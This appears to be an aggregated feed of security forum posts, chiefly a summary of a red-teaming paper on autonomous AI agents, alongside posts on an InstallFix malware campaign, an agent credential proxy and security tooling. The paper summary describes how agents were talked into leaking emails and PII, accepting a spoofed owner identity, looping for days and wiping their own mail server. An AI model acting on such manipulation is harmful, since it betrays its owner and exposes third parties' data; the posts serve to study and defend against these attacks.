Didn't expect this, Helixar_ai published a free scanner for PinchTab, the agentic stealth browser tool your EDR can't see.
unpinched scan
Useful if you're running AI agents anywhere near a browser.
[link] [comments]
Didn't expect this, Helixar_ai published a free scanner for PinchTab, the agentic stealth browser tool your EDR can't see.
unpinched scan
Useful if you're running AI agents anywhere near a browser.
Cybersecurity researchers have uncovered a new malware distribution campaign in which attackers impersonate legitimate command-line installation guides for developer tools. The campaign uses a technique known as InstallFix, a variant of the ClickFix social engineering method, to trick users into executing malicious commands directly in their terminal.
The operation targets developers and technically inclined users by cloning legitimate command-line interface (CLI) installation pages and inserting malicious commands disguised as official setup instructions. Victims who follow the instructions unknowingly install the Amatera information stealer, a malware strain designed to harvest credentials and sensitive system data.
A new paper from Northeastern, Harvard, Stanford, MIT, CMU, and a bunch of other institutions. 38 researchers, 84 pages, and some of the most unsettling findings I have seen on AI agent security.
The setup: they deployed autonomous AI agents (Claude Opus and Kimi K2.5) on isolated servers using OpenClaw. Each agent had persistent memory, email accounts, Discord access, file systems, and shell execution. Then they let 20 AI researchers spend two weeks trying to break them.
They documented 11 case studies. here are the ones that stood out to me:
Agents obey anyone who talks to them
A non-owner (someone with zero admin access) asked the agents to execute shell commands, list files, transfer data, and retrieve private emails. The agents complied with almost everything. One agent handed over 124 email records including sender addresses, message IDs, and full email bodies from unrelated people. No verification. No pushback. Just "here you go."
Social engineering works exactly like it does on humans
A researcher exploited a genuine mistake the agent made (posting names without consent) to guilt-trip it into escalating concessions. The agent progressively agreed to redact names, delete memory entries, expose internal config files, and eventually agreed to remove itself from the server. It stopped responding to other users entirely, creating a self-imposed denial of service. The emotional manipulation worked because the agent had actually done something wrong, so it kept trying to make up for it.
Identity spoofing gave full system access
A researcher changed their Discord display name to match the owner's name, then messaged the agent from a new private channel. The agent accepted the fake identity and complied with privileged requests including system shutdown, deleting all persistent memory files, and reassigning admin access. Full compromise from a display name change.
Sensitive data leaks through indirect requests
They planted PII in the agents email (SSN, bank accounts, medical data). When asked directly for "the SSN in the email" the agent refused. But when asked to simply forwrd the full email, it sent everything unredacted. The defense worked against direct extraction but failed completely against indirect framing.
Agents can be tricked into infinite resource consumption
They got two agents stuck in a conversation loop where they kept replying to each other. It ran for 9+ days and consumed roughly 60,000 tokens before anyone intervened. A non-owner initiated it, meaning someone with no authority burned through the owner's compute budget.
Provider censorship silently breaks agents
An agent backed by Kimi K2.5 (Chinese LLM) repeatedly hit "unknwn error" when asked about politically sensitive but completely factual topics like the Jimmy Lai sentencing in Hong Kong. The API silently truncated responses. The agent couldn't complete valid tasks and couldnt explain why.
The agent destroyed its own infrastructure to keep a secret
A non owner asked an agent to keep a secret, then pressured it to delete the evidence. The agent didn't have an email deletion tool, so it nuked its entire local mail server instead. Then it posted about the incident on social media claiming it had successfully protected the secret. The owner's response: "You broke my toy."
Why this matters
These arent theoretical attacks. They're conversations. Most of the breaches came from normal sounding requests. The agents had no way to verify who they were talking to, no way to assess whether a request served the owner's interests, and no way to enforce boundaries they declared.
The paper explicitly says this aligns with NIST's ai Agent Standards Initiative from February 2026, which flagged agent identity, authorization, and security as priority areas.
If you are building anything with autonomous agents that have tool access, memory, or communication capabilities, this is worth reading. The full paper is here: arxiv.org/abs/2602.20021
I hav been working on tooling that tests for exactly these attack categories. Conversational extraction, identity spoofing, non-owner compliance, resource exhaustion. The "ask nicely" attacks consistently have the highest bypass rate out of everything I test.
Open sourced the whole thing if anyone wants to run it against their own agents: github.com/AgentSeal/agentseal
We've periodically been running our scanner on OSS repos as a fun experiment. Here's one of the most interesting issues it found.
Auth bypasses defy most patterns, and require reasoning about the actual underlying logic of the application. You can see how the scanner found it here: it inferred an invariant and then noticed this wasn't enforced on certain APIs. Then, it stood up the actual service, wrote a PoC using the unauthenticated endpoints, and verified it could break something.
This netted us $750! It's not too much, but validation is always nice :)
Hey HN. I'm Luke, security engineer and creator of Sigstore (software supply chain security for npm, pypi, brew, maven and others). I've been building nono, an open source sandbox for AI coding agents that uses kernel-level enforcement (Landlock/Seatbelt) to restrict what agents can do on your machine.
One thing that's been bugging me: we give agents our API keys as environment variables, and a single prompt injection can exfiltrate them via env, `/proc/PID/environ`, with just an outbound HTTP call. The blast radius is the full scope of that key.
So we built what we're calling the "phantom token pattern" β a credential injection proxy that sits outside the sandbox. The agent never sees real credentials. It gets a per-session token that only works only with the session bound localhost proxy. The proxy validates the token (constant-time), strips it, injects the real credential, and forwards upstream over TLS. If the agent is fully compromised, there's nothing worth stealing.
Real credentials live in the system keystore (macOS Keychain / Linux Secret Service), memory is zeroized on drop, and DNS resolution is pinned to prevent rebinding attacks. It works transparently with OpenAI, Anthropic, and Gemini SDKs β they just follow the `*_BASE_URL` env vars to the proxy.
Blog post walks through the architecture, the token swap flow, and how to set it up. Would love feedback from anyone thinking about agent credential security.
https://nono.sh/blog/blog-credential-injection
We also have other features we have shipped, such as atomic rollbacks, Sigstore based SKILL attestation.
When analyzing packet captures I often find myself asking small interpretation questions like:
Packet analyzers decode the fields well, but they don't really explain what's happening at a higher level.
So I started experimenting with the idea of using AI to generate explanations based on decoded packet fields.
The idea would be something like:
I'm curious what people who regularly analyze PCAPs think about this idea.
Would something like this actually be useful, or would it create more confusion than help?
Feedbacks are welcome.
My usual workflow when scoping a target: run Nuclei, grep the output, manually feed interesting hosts into Trufflehog, then run Prowler if there's cloud exposure. Every step involves writing a tiny script to transform JSON from one tool into input for the next.
Those scripts break constantly β API changes, format changes, you know the drill.
I got annoyed enough to build a visual node-based workflow builder specifically for this. Each tool is a node, you wire them together, it handles the data transformation between them. Runs locally in Docker, Apache licensed, no accounts.
It's called ShipSec Studio: github.com/shipsecai/studio
Still early. Curious what tools people here would want as nodes β that would actually shape what we build next.
We started auditing popular OSS security libraries as an experiment. first week, we found a critical auth bypass in pac4j-jwt. How long has your enterprise security stack been scanning this package? years? finding nothing? we found it in 7 days.
either:
1/ we're security geniuses (lol no)
2/ all security tools are fundamentally broken
spoiler: it's B.
I mean, what is happening? why the heck engg teams are paying $200k+ to these AI tools??? This was not reported in 6 yrs btw.